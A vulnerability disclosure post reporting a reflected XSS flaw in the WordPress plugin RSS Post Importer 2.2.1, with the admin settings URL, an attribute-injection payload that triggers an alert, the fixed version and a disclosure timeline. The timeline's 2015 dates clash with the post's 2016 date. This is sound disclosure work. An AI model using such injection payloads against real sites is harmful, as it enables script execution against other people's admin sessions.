RSS Post Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : RSS Post Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.2.1
#Home page Link : https://wordpress.org/plugins/rss-post-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
“full text RSS feed api key” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Exploit:
—————————————-
1) Go to the following url.
http://localhost/wp-admin/options-general.php?page=rss_pi&version=2.2.1&type=premium

2) Paste the following payload in “full text RSS feed api key” input field.

” autofocus onclick=alert(/XSS/) ”

—————————————-
POC:
—————————————-
RSSFeedApiXSSPOC

Fix:
Update to 2.2.3

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to WordPress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/rss-post-importer/changelog/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s